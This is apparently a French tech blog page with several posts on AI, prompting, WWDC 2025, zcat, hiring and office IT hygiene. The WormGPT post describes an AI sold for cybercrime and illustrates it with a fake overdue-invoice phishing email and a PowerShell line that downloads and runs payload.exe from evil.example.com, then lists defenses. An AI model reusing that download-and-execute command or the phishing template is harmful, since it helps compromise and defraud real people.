Hacking, IA

WormGPT – IA qui aide les cybercriminels

WormGPT – IA qui aide les cybercriminels

Comment s’en protéger efficacement

L’intelligence artificielle ne sert pas qu’à écrire des poèmes ou coder des assistants vocaux… Elle peut aussi être détournée pour faire le mal. Et c’est là qu’intervient WormGPT, une IA redoutable conçue pour automatiser les cyberattaques. Dans cet article, je vous explique ce qu’est WormGPT, à quoi elle sert, des exemples réels d’usage, et surtout comment s’en prémunir en entreprise comme à la maison.

Qu’est-ce que WormGPT ?

WormGPT est une IA basée sur GPT-J, un modèle open-source de langage, mais débarrassée de toute limite éthique. Développée en 2023 par un hacker connu sous le pseudonyme “Last”, elle a été commercialisée sur des forums underground pour générer automatiquement :

  • Des e-mails de phishing ultra convaincants,
  • Des scripts PowerShell malveillants,
  • Des payloads de ransomware,
  • Des messages pour escroqueries BEC (Business Email Compromise).

Contrairement à ChatGPT, qui refuse de participer à des actions malveillantes, WormGPT a été conçue sans aucun garde-fou. Elle répond à toutes les requêtes, même les plus illégales.

Exemples concrets d’utilisation

Voici quelques cas d’usage identifiés dans les rapports de cybersécurité :

Génération d’e-mails de phishing ultra-ciblés (Spear Phishing)

Objet : Action requise - Facture impayée URGENTE

Bonjour [Nom de l’employé],

Veuillez trouver ci-joint la facture n°45602 en attente de règlement depuis le 4 juillet. En l'absence de paiement sous 24 heures, des frais supplémentaires s’appliqueront.

Bien cordialement,
Marie Delcourt
Direction Financière

Ce type de message est généré avec un ton professionnel, une signature réaliste, et contient souvent une pièce jointe malveillante ou un lien vers un faux portail Microsoft.

Génération de code PowerShell pour ouvrir une backdoor

Invoke-WebRequest -Uri http://evil.example.com/payload.exe -OutFile $env:TEMP\payload.exe
Start-Process $env:TEMP\payload.exe

Ce code, simple mais efficace, peut être injecté via une macro Excel, un mail HTML ou un script tiers.

Social engineering automatisé

WormGPT peut rédiger de faux CVs, des messages LinkedIn convaincants, voire des échanges fictifs pour gagner la confiance avant une attaque plus ciblée.

Contre-mesures à mettre en place

1. Sensibilisation des utilisateurs

  • Former les employés à reconnaître un message anormal (ton, urgence, fautes…).
  • Utiliser des campagnes de faux phishing pour entraîner les réflexes.

2. Vérifications techniques

  • Implémenter DMARC / SPF / DKIM pour sécuriser l’envoi d’e-mails.
  • Ajouter une bannière d’alerte sur les mails externes (« Cet email provient de l’extérieur de l’organisation »).

3. Surveillance comportementale

  • Mettre en place des SIEM ou outils de détection comme CrowdStrike, Darktrace, Elastic SIEM pour détecter les comportements anormaux.

4. Solutions d’IA défensive

  • L’IA n’est pas qu’un danger, elle peut aussi détecter les patterns malveillants.
  • Ex : Microsoft Defender for Endpoint, SentinelOne, ou Proofpoint utilisent de l’IA pour stopper les menaces en amont.

5. Test de red teaming / pentest

  • Faire auditer votre SI par des professionnels pour identifier les points faibles.
  • Simuler des attaques BEC, spear-phishing ou malware via des outils légitimes comme GoPhish.

Où en est WormGPT aujourd’hui ?

WormGPT a été officiellement fermé en août 2023, mais de nouvelles variantes sont apparues en 2024–2025, s’appuyant sur les modèles Grok (d’xAI) ou Mixtral (de Mistral AI). Elles circulent sur Telegram ou les dark markets, à des prix allant jusqu’à 5 000 € pour une version hébergée localement.

Conclusion

WormGPT illustre une tendance inquiétante : celle de l’IA au service du cybercrime. Heureusement, il est possible de s’en défendre avec une bonne hygiène numérique, des outils adaptés et surtout une culture de la vigilance.

💡 Rappel : Ce n’est pas la technologie qui est dangereuse en soi, c’est ce qu’on en fait. Et chez moi, sur ce blog, on préfère s’en servir pour protéger, éduquer et anticiper.

IA

Booster vos prompts avec ChatGPT

Booster vos prompts

IA

Modificateurs secrets pour booster vos prompts

 

On parle souvent d’astuces pour mieux “prompter” ChatGPT. C’est à la mode. Mais certaines commandes discrètes, encore peu connues du grand public, permettent réellement de transformer la manière dont vous interagissez avec le modèle. Dans cet article, je vous dévoile 4 modificateurs puissants et surtout comment les utiliser concrètement, avec en bonus mes recommandations de geek de terrain 

\n – Le retour à la ligne… maîtrisé

On l’utilise tous sans y penser. Mais le retour à la ligne (\n) peut devenir un outil stratégique.

Pourquoi c’est utile ?

ChatGPT fonctionne mieux lorsqu’on structure ses instructions. Utiliser des lignes distinctes, au lieu d’un gros bloc, améliore la compréhension du prompt.

Exemple :

Tu es un recruteur spécialisé IT. 
\nTu vas analyser ce CV. 
\nDonne-moi les points faibles techniques.
\nFais-moi un retour clair, en bullet points.

Mon astuce :

Utilise des sections comme dans un document Word. Tu peux même simuler des titres :

## CONTEXTE :
\nJe prépare un entretien pour un poste DevSecOps.

## OBJECTIF :
\nJe veux impressionner sur la partie sécurité.

## BESOIN :
\nDonne-moi 5 sujets techniques à préparer.

Résultat : le modèle structure mieux sa réponse et évite de partir dans tous les sens.

-- – La double-pause qui ordonne

Le double tiret -- est interprété comme une séparation logique ou une indication de liste par ChatGPT.

Exemple :

Fais-moi un tableau comparatif entre :
-- Windows 11
-- macOS Sonoma
-- Debian 13

Pourquoi ça marche ?

Cela permet à ChatGPT de détecter une énumération ou une comparaison implicite. Il est plus fluide, plus clair.

Je recommande :

Je l’utilise pour donner des alternatives sans que le modèle me coupe avec des explications inutiles :

Tu es un expert réseau.
Voici 3 options de firewall open source :
-- OPNsense
-- pfSense
-- IPFire
Fais-moi un classement selon :
-- Facilité d’installation
-- Interface web
-- Mise à jour
-- Fonctionnalités avancées

Bonus : ça marche encore mieux avec les tableaux (|), mais ça, on en parle plus bas.

// – L’annotation contextuelle (ma préférée)

Le // sert à ajouter des commentaires dans le prompt. ChatGPT comprend qu’il ne doit pas les exécuter comme instructions, mais les prendre comme contexte ou mémo.

Exemple :

Rédige un article de blog sur l’IA générative.
// Le public est expert.
// Le ton doit être technique mais accessible.
// Évite les buzzwords inutiles.

Résultat : plus besoin d’alourdir le prompt principal. Vous structurez vos instructions comme un développeur structure son code.

On en parle franchement :

Si vous ne maîtrisez pas encore les “roles” ou les “personas” dans vos prompts, les // sont un excellent moyen de guider ChatGPT sans vous prendre la tête avec des balises JSON.

|| – La séparation entre options

Ce symbole (deux pipes verticaux ||) est très utile pour formuler des alternatives dans une seule ligne.

Exemple :

Propose-moi un nom de projet IA qui soit :
court || évocateur || avec une racine latine

À savoir :
ChatGPT comprendra ici que vous ne voulez pas tout en même temps (sauf si précisé), mais qu’il doit chercher un compromis ou plusieurs propositions.

Mon usage perso :

Je l’emploie pour créer des prompts exploratoires :

Fais-moi une accroche pour un flyer sur l’IA :
|| style geek
|| style startup friendly
|| style vulgarisation pour DSI

Tu obtiens 3 propositions directement, bien différenciées. C’est top pour brainstormer rapidement.

BONUS : Combine-les tous

On peut bien sûr empiler ces modificateurs pour créer des prompts ultra-structurés.

Exemple :

Tu es un expert en cybersécurité.
\nAnalyse cette situation :
\nUne entreprise subit un ransomware.
\n-- Impact technique
\n-- Impact juridique
\n-- Plan de réponse
// Ton public : RSSI
|| style concis || style rapport d’incident || style article LinkedIn

Résultat structuré, lisible, adapté au contexte, avec plusieurs versions possibles !

En résumé : Le tableau de survie des modificateurs

Symbole Utilité principale Idéal pour…
\n Structurer / aérer les instructions Rédactions longues ou prompts multi-étapes
-- Enumérations et séparateurs logiques Comparaisons, tableaux, checklist
// Ajouter des commentaires non exécutés Contexte invisible, mémo interne
`   `

Recommandations Christophe

  • Utilise-les comme des LEGO : tu veux une réponse claire, obtiens-la en structurant ton prompt comme tu structurerais un mail à ton boss.
  • Ne fais pas d’hybride flou : évite de mélanger tout sans hiérarchie. Un prompt bien écrit, c’est comme un plan de projet : clair, lisible, et compréhensible par une IA… ou un humain.
  • Teste à la volée : ChatGPT répond mieux quand tu écris en mode « prise de notes ». Ces symboles aident à ce style-là.

Envie d’aller plus loin ?

J’ai testé plein de modificateurs, mais ceux-ci sont les plus simples à adopter au quotidien. Pour ceux qui veulent aller plus loin, je prépare un article sur les prompts avancés avec :

  • JSON structuré
  • chaînes de rôles (<system>, <user>, etc.)
  • prompts dynamiques pour automatisation.

 

Le prompting, c’est comme l’écriture technique : on progresse à chaque usage.
📌 Partage cet article à ceux qui écrivent encore leurs prompts comme ils taperaient dans Google 😅

Non classé

Les intelligences artificielles : panorama, usages, limites et perspectives

Les intelligences artificielles : panorama, usages, limites et perspectives

1. Les IA textuelles : cerveau numérique à portée de clavier

Les intelligences artificielles textuelles ont été les premières à se démocratiser dans les usages professionnels et personnels. On parle ici de modèles comme ChatGPT, Claude, Gemini, Mistral, ou encore LLaMA. Ces IA, basées sur le traitement du langage naturel (NLP), sont entraînées sur des milliards de mots pour comprendre, résumer, traduire, corriger, ou générer du contenu écrit.

Avantages

  • Polyvalence : réponse à des questions, rédaction d’articles, génération de code, traduction…
  • Productivité : assistant rédactionnel, aide à la décision, synthèse rapide.
  • Accessibilité : intégration dans des interfaces simples (chat, plugins, extensions).

Inconvénients

  • Hallucinations : certaines réponses peuvent être fausses ou inventées.
  • Biais : l’IA peut reproduire les biais présents dans les données d’entraînement.
  • Déconnexion du contexte réel : pas de compréhension réelle, juste des probabilités.

Exemples d’usage

  • Rédaction d’emails, rapports ou billets de blog.
  • Génération de code avec GitHub Copilot.
  • Assistants clients ou FAQ automatisées.

2. Les IA multimodales : comprendre texte, image, son et vidéo

Les IA multimodales combinent plusieurs types d’entrée : texte, image, vidéo, audio, voire des capteurs physiques. Des exemples puissants : GPT-4o, Gemini 1.5, Claude 3 Opus, Grok-1.5V, MM1, ou encore Perceiver.

Avantages

  • Compréhension plus globale : analyse croisée d’un texte et d’une image ou d’une vidéo.
  • Assistants polyvalents : analyse de documents PDF avec schémas, reconnaissance vocale, génération de vidéos, etc.
  • Applications professionnelles puissantes : médecine (radiologie), sécurité (vidéosurveillance), industrie (maintenance prédictive).

Inconvénients

  • Besoin en ressources élevé : coût matériel et énergétique important.
  • Latence parfois importante : temps de traitement plus long selon les formats.
  • Risque de faux positifs : mauvaise interprétation d’une image ou d’un son.

Exemples d’usage

  • Détection d’objets sur des caméras de sécurité.
  • Résumé automatique de réunions enregistrées.
  • Génération d’illustrations à partir de texte (ex. DALL·E, MidJourney).

3. Tableau comparatif des principales IA

Type d’IA Nom / Exemple Entrées Avantages Inconvénients
Textuelle ChatGPT, Claude, Gemini Texte Polyvalente, rapide, utile au quotidien Peut halluciner, biais, pas de compréhension réelle
Multimodale GPT-4o, Gemini 1.5, Grok Texte, image, son Analyse globale, puissant pour l’entreprise Gourmande en ressources, interprétation imparfaite
Visuelle DALL·E, MidJourney Texte → Image Création artistique rapide Résultats parfois incohérents, pas de droit d’auteur clair
Audio Whisper, Bark, MusicLM Voix, musique Transcription, synthèse vocale, création audio Prononciation imparfaite, voix peu naturelles parfois
Vidéo Sora, RunwayML, Pika Texte, image, vidéo Génération vidéo, effets spéciaux Complexité élevée, besoin d’un bon prompt
Code Copilot, CodeWhisperer Texte (code) Aide aux développeurs Risque de bug, nécessite validation humaine

4. Les autres IA : spécialisation et verticalisation

Au-delà des grands modèles généralistes, une multitude d’IA spécialisées se développent dans tous les domaines.

IA audio (voix, musique)

  • Synthèse vocale : Text-to-Speech (TTS) comme ElevenLabs ou Bark.
  • Reconnaissance vocale : Whisper (OpenAI), DeepSpeech (Mozilla).
  • Génération musicale : Suno, MusicGen, Riffusion, MusicLM.

Points forts : accessibilité, création de voix personnalisées, outils d’inclusion (ex. lecture à voix haute pour les malvoyants).
Limites : qualité sonore, émotions limitées, parfois monotones.

IA vidéo

  • Text-to-video : Sora (OpenAI), Runway, Pika Labs.
  • Deepfakes & avatars IA : Synthesia, HeyGen.

Points forts : production audiovisuelle rapide, réduction des coûts de tournage.
Limites : lourdeur technique, éthique (deepfakes, manipulation).

IA pour la cybersécurité

  • Détection d’anomalies réseau : Darktrace, Vectra AI.
  • Analyse comportementale : SIEM boostés par l’IA (ex. Microsoft Sentinel).

Avantages : proactivité, corrélation d’alertes.
Inconvénients : faux positifs, dépendance à la qualité des logs.

5. Et après ? Le futur proche des IA

L’avenir à moyen terme (3 à 5 ans) ne sera pas celui d’une IA forte, mais de l’orchestration intelligente de modèles faibles.

1. Hyperpersonnalisation

Les IA seront capables d’adapter leur comportement, leur voix ou leur style d’écriture à votre personnalité, votre humeur ou votre contexte (pro, perso, santé, apprentissage…).

2. Autonomie partielle

Des IA agents (AutoGPT, Devin, etc.) capables d’enchaîner plusieurs actions de manière autonome : réserver un billet, rédiger un rapport et l’envoyer, ou analyser un journal système.

3. Fusion IA + objets connectés

La domotique, les véhicules, les lunettes connectées ou les prothèses intelligentes intégreront des IA embarquées, contextualisées, non-connectées (edge computing).

4. Régulation et souveraineté

Des IA locales et éthiques (comme Mistral ou Aleph Alpha) vont émerger face aux modèles américains ou chinois. L’Europe commence à bâtir son écosystème.

Conclusion : l’IA en 5 temps

  1. Observer : connaître les types d’IA, leur fonctionnement, leurs usages.
  2. Tester : s’approprier les outils (textuels, visuels, audio, etc.).
  3. Adapter : choisir les IA selon les besoins réels (et pas l’effet de mode).
  4. Superviser : toujours garder un œil humain, l’IA n’est pas une vérité.
  5. Anticiper : rester en veille sur les évolutions, les risques, les opportunités.

 

IA, Métiers, Travail

Techniques de Prompt en Entreprise

Techniques de Prompt en Entreprise

 

 

Exemples Adaptés par Service en entreprise

 

L’art de bien prompter un LLM (Large Language Model) permet d’obtenir des réponses plus précises, pertinentes et actionnables. Dans un contexte professionnel, chaque service peut tirer parti de formulations spécifiques pour guider l’IA vers des résultats utiles. Voici des exemples concrets, service par service, avec 5 prompts efficaces et adaptables à chaque usage.

En fournissant du contexte et des exemples pertinents dans votre requête, vous aidez l’IA à comprendre la tâche souhaitée et à générer des résultats plus précis et pertinents.

Service RH (Ressources Humaines)

 

Tu es au service Ressources humaines d’une entreprise, Tu es un pro de l’organisation, peux tu, étape par étape…

  1. « Crée un guide d’accueil pour un nouvel employé dans le service [nom du service] en listant les étapes essentielles jour par jour. »
  2. « Résume une fiche de poste en la rendant compréhensible pour un collègue non expert du métier. »
  3. « Génère une grille d’entretien pour évaluer un candidat sur des compétences techniques et comportementales. »
  4. « Fais une synthèse comparative entre deux CV pour un poste donné. »
  5. « Simule une discussion entre un manager et un salarié sur un objectif non atteint, en adoptant une posture constructive. »

 

Service Marketing

Tu es au service marketing d’une entreprise, tu comprend les attentes des clients et la situation du marché…

  1. « Propose une campagne marketing pour le lancement d’un produit, avec des idées pour chaque canal (email, réseaux, print). »
  2. « Crée une FAQ client à partir de ce texte de présentation produit. »
  3. « Réécris ce texte publicitaire en 3 versions : professionnelle, conviviale et humoristique. »
  4. « Fais une analyse SWOT rapide du produit [X]. »
  5. « Résume les résultats de cette campagne précédente en 5 points clés pour la direction. »

 

Service Commercial

Tu est un employés à l’Administration des ventes…

  1. « Simule une conversation client où tu défends le prix d’une offre face à un concurrent. »
  2. « Génère 3 relances d’emails différentes pour un devis resté sans réponse. »
  3. « Liste les objections possibles pour ce produit et propose une réponse pour chaque. »
  4. « Crée un argumentaire produit en 4 étapes logiques pour une formation commerciale. »
  5. « Résume cet appel client de 15 minutes en un compte rendu clair, organisé par thème. »

 

Service Juridique

Tu es au service juridique d’une entreprise, Tu es un pro des lois et réglementations lié au travail et à la vie des entreprises. Peux tu, étape par étape…

  1. « Explique cette clause contractuelle de manière compréhensible pour un non-juriste. »
  2. « Résume les risques juridiques d’une opération de fusion dans une entreprise de moins de 50 salariés. »
  3. « Formule un récapitulatif des obligations RGPD en 5 points pratiques pour un DSI. »
  4. « Crée un tableau comparatif entre deux régimes juridiques applicables à cette situation. »
  5. « Simule une consultation juridique entre un avocat et un client sur une rupture de contrat. »

 

Service Informatique (IT)

Tu est un expert en informatique au service IT…

  1. « Rédige un rapport d’incident système en listant les causes possibles, l’impact, les actions prises et les prochaines étapes. »
  2. « Explique ce script Bash ligne par ligne à un débutant. »
  3. « Crée une documentation technique pour l’installation d’un VPN en entreprise. »
  4. « Simule une alerte sécurité envoyée à tous les employés suite à une tentative de phishing. »
  5. « Liste les vérifications à faire avant de mettre une application en production. »

 

Conclusion

 

Le prompt « étape par étape » est une porte d’entrée vers un monde de formulations spécialisées. En adaptant le vocabulaire, le niveau de technicité et le ton, chaque service peut tirer le meilleur des modèles de langage. N’hésitez pas à enrichir ces exemples en fonction de vos contextes propres !

Informations, Matériels, raconte-moi

WWDC 2025 : Apple iOS 26

WWDC 2025 : Apple dévoile iOS 26, Liquid Glass et son IA… en regardant Android du coin de l’œil

WWDC 2025 : Apple iOS 26

WWDC 2025 : Apple dévoile iOS 26

Ce 10 juin, Apple a levé le voile sur les prochaines versions de ses systèmes. Nouvel iOS, refonte visuelle, intelligence artificielle maison… mais derrière les paillettes de Cupertino, difficile de ne pas y voir un rattrapage assumé sur certaines fonctionnalités déjà bien installées chez Android. Voici un tour d’horizon critique et sans langue de bois de la keynote WWDC 2025.

Liquid Glass : une refonte visuelle majeure

Apple parle du plus grand redesign depuis iOS 7. Avec Liquid Glass, l’interface devient plus fluide, plus transparente, et très orientée reflets et lumière. En clair, ça brille, c’est épuré, c’est homogène sur tous les appareils : iPhone, iPad, Mac, Apple Watch… toute la gamme passe sous ce filtre visuel élégant.

Mais soyons honnêtes : si le rendu est léché, on reste dans une approche très contrôlée. À l’inverse d’Android et de son Material You, qui propose une personnalisation dynamique des couleurs, des icônes et des widgets, Apple continue de choisir pour l’utilisateur. Beau ? Oui. Libre ? Non.

iOS 26 : fonctions utiles… mais souvent vues ailleurs

Le nouvel iOS apporte son lot de nouveautés bien pratiques :

  • Traduction en temps réel (si possible 🤣) dans Messages, FaceTime et Téléphone.
  • Filtrage intelligent des appels (Call Screening) et assistant d’attente (Hold Assist).
  • Genmoji : création de nouveaux emojis à la volée.
  • Possibilité de personnaliser les fonds dans les conversations Messages.
  • Nouvelle app Jeux avec bibliothèque centralisée, classements, etc.
  • Améliorations dans Safari, Wallet, Musique, Plans, CarPlay…

Mais là encore, une partie de ces fonctionnalités sont des rattrapages. Le filtrage des appels ? Présent sur Android (et notamment les Pixel) depuis des années. La traduction temps réel ? Google le propose déjà via son assistant et Translate.

Apple peaufine, oui. Mais innove-t-il ? Pas toujours.

Apple Intelligence : une IA timide mais privée

Apple entre enfin dans la danse de l’intelligence artificielle. Avec « Apple Intelligence », la firme propose une IA intégrée, avec calculs en local sur l’appareil si possible, ou dans le cloud via un système maison appelé « Private Cloud Compute ».

Point notable : en cas de besoin, l’IA d’Apple peut faire appel à ChatGPT (GPT-4o) pour compléter certaines tâches complexes. Apple s’ouvre, discrètement, à l’expertise d’OpenAI.

Mais malgré ces efforts, Siri reste en retrait. Les annonces d’un assistant vocal réellement boosté à l’IA sont repoussées, car Apple dit vouloir « atteindre un haut niveau de qualité » avant de le lancer. Traduction : ce n’est pas encore prêt, et Google Assistant (ou Gemini) reste loin devant en termes de maturité et de réactivité.

Android vs Apple : la course à l’innovation

En observant cette keynote, on ressent une chose : Apple se sécurise, là où Android tente, expérimente, avance vite – parfois trop vite, mais souvent plus loin.

Voici un rapide comparatif :

Fonction Apple (iOS 26) Android (13/14/15…)
Interface visuelle Liquid Glass, homogène, épuré Material You, coloré, très personnalisable
Traduction en direct Intégrée, privée Multilingue, rapide via le cloud
Assistant vocal Siri amélioré (bientôt) Gemini/Bard déjà bien en place
Appels intelligents Call Screening enfin arrivé Présent depuis longtemps
IA créative (emoji, images) Genmoji, fonds dynamiques Déjà dispo dans Gboard, Android Studio
Confidentialité Forte priorité Variable selon fabricant et modèle

Mon avis : Apple soigne la forme, Android garde le fond

Apple brille. Le design, la fluidité, la finition : rien à redire. Mais sur le fond, Android continue de creuser l’écart, notamment grâce à l’avance prise sur l’IA, la personnalisation, et l’intégration des services cloud.

Le choix est clair :

  • Un écosystème verrouillé mais, avec un design irréprochable ? Apple est pour toi.
  • Tu préfères personnaliser ton téléphone, tester les dernières IA, ajuster chaque détail à ta sauce ? Android reste devant.

Conclusion

Apple n’a pas révolutionné le jeu avec cette WWDC 2025, mais elle a solidifié ses bases et corrigé plusieurs retards. L’IA arrive, le design évolue, et l’écosystème reste d’une cohérence exemplaire.

Mais côté innovations brutes, le moteur Android tourne toujours plus vite. À Apple maintenant de ne pas seulement suivre, mais d’oser reprendre les devants.

Administration, Debian GNU/Linux

le contenu des fichiers compressés sans les décompresser zcat

Lire le contenu des fichiers compressés sans les décompresser avec zcat

contenu des fichiers compressés sans les décompresser

contenu des fichiers compressés sans les décompresser

La ligne de commande de GNU/Linux regorge d’outils discrets mais puissants. Après avoir exploré zgrep, qui permettait de rechercher du texte à l’intérieur de fichiers compressés .gz, penchons-nous aujourd’hui sur son cousin : zcat.

Si vous manipulez régulièrement des fichiers .gz, zcat devient vite un indispensable pour inspecter rapidement leur contenu sans les décompresser sur le disque.

Qu’est-ce que zcat ?

zcat est l’équivalent de la commande cat pour les fichiers compressés au format gzip (.gz). Il affiche simplement le contenu d’un fichier compressé dans le terminal. Contrairement à gunzip, qui extrait réellement le fichier, zcat ne touche pas au fichier d’origine et ne crée aucun fichier temporaire. Il décompresse « à la volée » pour une lecture directe.

Exemple basique

Prenons un fichier compressé :

$ ls
access.log.gz

Si vous souhaitez voir son contenu sans le décompresser :

$ zcat access.log.gz

Cela affichera le contenu dans le terminal, tout simplement. Si le fichier est trop long, vous pouvez le combiner avec less :

$ zcat access.log.gz | less

Ou pour voir uniquement les 10 premières lignes :

$ zcat access.log.gz | head

Pourquoi utiliser zcat ?

Voici quelques cas d’usage où zcat brille :

  • Audit de logs compressés automatiquement chaque nuit (typiquement access.log.1.gz, syslog.2.gz, etc.).
  • Tests rapides sur des archives .gz sans toucher aux originaux.
  • Économie de disque, car aucune extraction temporaire n’est nécessaire.

Différences avec gunzip -c

Vous pouvez obtenir le même résultat avec :

$ gunzip -c access.log.gz

ou encore :

$ gzip -dc access.log.gz

Mais zcat reste plus court et plus naturel dans un pipeline shell.

💡 À noter : sur certains systèmes, zcat est un alias de gzip -dc, mais sur d’autres (notamment BSD), il peut être un binaire différent. Toujours vérifier avec which zcat ou file $(which zcat) si besoin.

Bonus : combiner zcat et grep

Même si zgrep est souvent plus simple, vous pouvez aussi chaîner zcat et grep manuellement :

$ zcat access.log.gz | grep "erreur 500"

Cela donne plus de contrôle (ex. : ajouter des --color, -C3, etc.).

Et avec plusieurs fichiers ?

Pas de problème, zcat accepte plusieurs arguments :

$ zcat logs/*.gz | grep "connexion refusée"

Idéal pour scanner des logs étalés sur plusieurs jours. Pour lire le contenu des fichiers compressés sans les décompresser.

Conclusion

Tout comme zgrep, zcat est un outil minimaliste et efficace à ajouter à votre trousse à outils Linux. Il fait une seule chose, mais il le fait bien : lire le contenu d’un fichier .gz sans avoir à le décompresser manuellement.

En l’associant avec les classiques less, grep, awk, tail, etc., il devient un allié puissant pour l’administration système, l’analyse de logs et les scripts d’automatisation.

Pour aller plus loin ?  Explorez :

  • zmore : l’équivalent de more pour les fichiers .gz
  • zless : identique à less, mais pour les .gz
  • znew : convertir des .Z en .gz (plus rare aujourd’hui)

Besoin de scripts concrets ou de l’intégrer dans un workflow DevOps ou d’audit ? N’hésite pas à me le demander 😉 contactez-moi

Informations, Informatique, Travail

Comment décrocher un entretien pour un poste en informatique

Comment décrocher un entretien en informatique : ce que le recruteur regarde vraiment

 

 

« Je ne recrute pas. Mais je vois passer des profils, des parcours, des ratés… et je sais très bien ce qui fait qu’un CV finit en entretien ou à la corbeille. »

 

Je suis tombé dans l’informatique avant que le cloud existe. Aujourd’hui, entre deux projets, je prends le temps d’analyser ce qui marche — et surtout, ce qui ne marche plus — quand on cherche à bosser dans ce secteur.

Dans un monde numérique saturé de CVs générés par IA, de profils clonés sur LinkedIn et de buzzwords alignés comme des dominos, comment se démarquer réellement quand on cherche un poste en informatique ? Il faut savoir que l’informatique, c’est vaste. Il faut trouver un domaine ‘dans’ l’informatique . Il faut se renseigner sur les metiers de l’informatique pour ne pas être trop généraliste.

Je vais vous parler ici comme un recruteur — ou plutôt comme un DRH qui doit faire le tri dans un océan de candidatures. Pas pour décourager, mais pour vous aider à franchir cette première barrière : celle du pré-tri.

Le vrai processus derrière l’écran

Avant de parler du “comment décrocher un entretien”, il faut comprendre ce qu’il se passe en coulisses :

  1. Réception de CV : En moyenne, une offre d’emploi en informatique attire entre 100 et 300 candidatures en moins de 72h.
  2. Pré-tri automatique : Utilisation d’outils d’ATS (Applicant Tracking System) qui scannent les CV à la recherche de mots-clés.
  3. Tri manuel (rapide) : Moins d’une minute par CV (chronomètre en main), je repère l’essentiel : cohérence, lisibilité, adéquation.
  4. Vérification de la réputation numérique : LinkedIn, GitHub, Stack Overflow, parfois Twitter ou Mastodon.
  5. Pré-entretien (téléphonique ou vidéo) : Pour tester la motivation réelle et la capacité à communiquer.

🛠️ Les outils qu’on utilise pour filtrer (et ce qu’ils révèlent)

Tu veux savoir ce que je vois en premier en tant que recruteur informatique ?

Outil / Méthode Ce que je regarde Ce que tu dois optimiser
ATS (Recruitee, Taleo, etc.) Mots-clés, formats, expériences Ton CV doit contenir les bons mots-clés contextuels (pas une liste brute).
LinkedIn Recruiter Cohérence profil / CV, recommandations, activité Ton résumé doit être un pitch, pas un cliché.
GitHub / GitLab Qualité de code, fréquence, README, structure Mieux vaut 3 projets propres que 15 forkés sans doc.
Recherche Google Empreinte numérique, blogs, conférences, formations Avoir une identité tech affirmée est un + (ton blog, tes talks, etc.).

Ce qui fait cliquer sur ton profil

Les critères qui déclenchent l’envie de t’appeler pour un entretien ne tiennent pas en une “formule magique”, mais il y a des constantes. Voici ce que je valorise chez un profil informatique solide :

  1. Cohérence de parcours : Pas besoin d’avoir fait le MIT, mais montre-moi une ligne directrice dans ton apprentissage et tes choix.
  2. Contributions concrètes : Tu as corrigé un bug open source ? Tu expliques comment tu as mis en place une CI/CD sur GitLab ? Parfait.
  3. Curiosité technique : Le genre de personne qui bidouille un Raspberry Pi pour automatiser l’arrosage des plantes, c’est un red flag positif.
  4. Documentation personnelle : Un portfolio, un blog, ou même une présentation sur Notion qui montre ta méthode.

Ce qui te mène à l’entretien (ou pas)

✅ Les signaux qui me donnent envie de te parler :

  • Un message de motivation court mais percutant (pas un roman, pas une phrase bateau).
  • Une spécialisation assumée (DevOps, cybersécu, backend Rust…) avec un discours clair.
  • Un CV lisible, en PDF, compatible ATS (évite les tableaux Word pour l’amour du ciel).
  • Une trace personnelle : un article, un projet, une vidéo YouTube bien faite.

❌ Les erreurs qui t’éliminent en 10 secondes :

  • Le copier-coller de texte LinkedIn type “passionné de tech depuis mon enfance”.
  • L’absence totale de lien vers des projets ou du code.
  • Un CV trop dense ou trop vide (équilibre = clé).
  • Aucune personnalisation dans la candidature.

Mon conseil de recruteur : joue aussi avec les codes

Un bon candidat sait coder. Un excellent candidat sait communiquer qu’il sait coder.

Ce que tu vends, ce n’est pas juste un ensemble de compétences techniques, c’est aussi une capacité à t’intégrer dans une équipe, à évoluer, à être autonome, à t’adapter. Et ça, aucun ATS ne le lit. Mais moi, je le détecte.

Conclusion : être bon ne suffit plus, il faut être visible et lisible

Dans le monde de l’informatique, le niveau technique est nécessaire, mais pas suffisant. L’aisance à montrer ce niveau, à le démontrer avec humilité, clarté et structure, fait toute la différence.

Alors si tu cherches un job en dev, en système, en cybersécurité ou en IA, demande-toi : est-ce que mon profil donne envie de cliquer ?

Et si tu veux aller plus loin, construis ton propre site, rédige tes process, documente tes échecs. En un mot : rends-toi incontournable.

🔗 Tu veux un retour honnête sur ton profil LinkedIn ou GitHub ? Tu peux me l’envoyer, 

 

Informatique, Travail

Informatique au bureau les regles de bonnes conduites

Informatique au bureau – les règles de bonnes conduites en entreprise

Informatique au bureau, quelles sont les regles pour préserver son outil de travail ? Le coût, l’impacte écologique, la perte de ses habitudes. C’est autant de raison de préserver son outil informatique. Les conseils sont adaptable à du materiels personnel. Raison de plus pour les mettres en pratiques !

 

✅ RÈGLES DE BONNE CONDUITE

🔒 Sécurité

  • Verrouillez votre session dès que vous vous absentez.
  • Ne communiquez jamais vos mots de passe.
  • Ne branchez aucune clé USB inconnue.
  • Ne téléchargez pas de logiciels sans autorisation.

📧 Messagerie

  • Méfiez-vous des pièces jointes et liens suspects.
  • En cas de doute, contactez immédiatement le support.
  • Utilisez votre boîte pro uniquement pour un usage professionnel.

🌐 Navigation web

  • Restez sur des sites utiles et sûrs.
  • Ne contournez jamais les protections mises en place.
  • Téléchargement = risque si la source n’est pas fiable.

🔄 REDÉMARREZ VOTRE POSTE !

💡 Un redémarrage = un poste plus sain

  • Permet d’appliquer les mises à jour de sécurité.
  • Corrige certains bugs ou lenteurs.
  • Rafraîchit la mémoire et les services système.

Fréquence recommandée : 1 fois par semaine minimum
⚠️ Un redémarrage ≠ une simple fermeture du capot !

🔋 OPTIMISEZ VOTRE BATTERIE (PORTABLE)

Gestes simples

  • Activez le mode économie d’énergie.
  • Baissez la luminosité de l’écran.
  • Fermez les applis non utilisées.

Conseils techniques

  • Débranchez l’alimentation entre 80-90% de charge.
  • Rechargez quand ça descend sous 30-40%.
  • Une décharge complète par mois = meilleure durée de vie.

🧼 ENTRETIEN & BON SENS

  • Nettoyez votre écran et clavier régulièrement.
  • Gardez les grilles de ventilation dégagées.
  • Évitez de manger ou boire près du matériel.
  • Rangez toujours votre portable en lieu sûr.
Non classé, Recherche, Web

Visible sur Google à l’ère de l’IA : ce qu’il faut retenir

Être (encore) visible sur Google à l’ère de l’IA : ce qu’il faut retenir

 

Visible sur Google à l’ère de l’IA

Google change (encore). Depuis mai 2024, les résultats enrichis par l’IA – les fameux AI Overviews – sont devenus le nouveau standard pour une partie des recherches. Résultat : les pages web classiques se retrouvent encore plus en bas, sous un résumé généré par l’IA. Une révolution ? Oui. Une menace pour le SEO ? Clairement.

Voici ce qu’il faut comprendre (et faire) pour rester visible dans ce nouveau monde.

1. AI Overviews : c’est quoi exactement ?

